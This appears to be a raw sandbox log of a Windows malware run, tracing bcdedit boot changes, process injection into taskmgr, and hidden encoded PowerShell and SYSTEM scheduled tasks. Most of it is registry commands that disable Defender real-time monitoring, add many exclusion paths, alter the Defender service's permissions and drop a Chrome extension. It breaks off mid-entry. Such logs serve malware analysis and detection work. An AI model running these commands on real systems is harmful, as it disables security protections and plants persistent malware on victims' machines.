- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:356
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:820
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2736
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1424
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2080
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2824
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2492
- C:\Windows\system32\bcdedit.exe
  C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1464

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
1⤵
- Creates scheduled task(s)
PID:2840

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1748

C:\Users\Admin\AppData\Local\Temp\7zS57E0.tmp\Install.exe
.\Install.exe /LzfYdidLoSR "385118" /S
1⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:2632
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gqYaWtvqQ" /SC once /ST 18:06:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:1436
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gqYaWtvqQ"
  2⤵
  PID:2760
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gqYaWtvqQ"
  2⤵
  PID:2276
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "bmfUAJAHieefCXsdaD" /SC once /ST 19:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\gomnsiX.exe\" hp /PAsite_idYim 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:1548

C:\Users\Admin\AppData\Local\Temp\7zS53BB.tmp\Install.exe
.\Install.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2328

C:\Windows\system32\taskeng.exe
taskeng.exe {B6F7580B-AB03-48DE-B724-2A467D5B848A} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]
1⤵
PID:2688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2580
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:3060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:1548
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:2200
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2428

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2776

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
1⤵
- Delays execution with timeout.exe
PID:768

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:2060

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2216

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:3056

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
PID:1096

C:\Windows\system32\taskeng.exe
taskeng.exe {E41C8CD6-18D5-48CA-A1E0-62A8F4D5D213} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1536
- C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\gomnsiX.exe
  C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\gomnsiX.exe hp /PAsite_idYim 385118 /S
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gvLMTMFhl"
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gvLMTMFhl" /SC once /ST 17:18:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2480
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gwafWndRF"
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gwafWndRF" /SC once /ST 10:43:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:2300
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:792
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gvLMTMFhl"
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gwafWndRF"
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2928
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1892
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:300
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1368
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1520
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\fgekRaJKKiJdEvwV\FVedjIOu\WDTPLufJtzjDlXEw.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1940
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2660
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1704
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2756
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2852
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:328
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2608
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2680
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1892
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1252
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2648
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1044
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2164
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2656
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1448
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2916
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1416
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2440
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2904
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2736
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2844
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3044
    - - C:\Windows\SysWOW64\reg.exe
        
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
        5⤵
        
        PID:328
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      Windows security bypass
      PID:2624
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2740
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2532
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2832
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2728
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\cvDkMpEVJyabfeVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1512
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1736
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:600
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1328
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2696
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2804
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:820
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2256
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1556
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2628
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gOQPJdCFD"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gOQPJdCFD" /SC once /ST 06:28:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1056
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\fgekRaJKKiJdEvwV\FVedjIOu\WDTPLufJtzjDlXEw.wsf"
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fgekRaJKKiJdEvwV" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "HddpujWaDpLIbkLdt" /SC once /ST 07:02:48 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\jhxefMU.exe\" gT /IHsite_idlhe 385118 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:2920
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "HddpujWaDpLIbkLdt"
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gOQPJdCFD"
    3⤵
    PID:1796
- C:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\jhxefMU.exe
  C:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\jhxefMU.exe gT /IHsite_idlhe 385118 /S
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  PID:572
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bmfUAJAHieefCXsdaD"
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:1220
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      PID:2844
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\IAvstfEYU\AuFrTe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gcsaRhxvmhmmEZS" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:288
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:3044
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gcsaRhxvmhmmEZS2" /F /xml "C:\Program Files (x86)\IAvstfEYU\GmHcrYO.xml" /RU "SYSTEM"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Creates scheduled task(s)
    PID:1544
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "gcsaRhxvmhmmEZS"
    3⤵
    PID:776
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gcsaRhxvmhmmEZS"
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "IsxNCaiPdRDTBP" /F /xml "C:\Program Files (x86)\gNEkwGGiCnIU2\QsdoUQI.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1436
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "GQBvHPrMcnsQR2" /F /xml "C:\ProgramData\cvDkMpEVJyabfeVB\AEdiFJU.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2600
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "FDSsfUJUNzWcTDuAR2" /F /xml "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\NmHzpzx.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:320
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "mTrzZzYaKbZcxyPVaUZ2" /F /xml "C:\Program Files (x86)\WNdNVmbTRKpEC\JNOdhmq.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1372
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "drPQSDndGmRZEFerX" /SC once /ST 15:28:48 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\fgekRaJKKiJdEvwV\LTMUWVrL\sEZfUth.dll\",#1 /Amsite_idnvV 385118" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:2440
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "drPQSDndGmRZEFerX"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:1644
  - - C:\Windows\SysWOW64\reg.exe
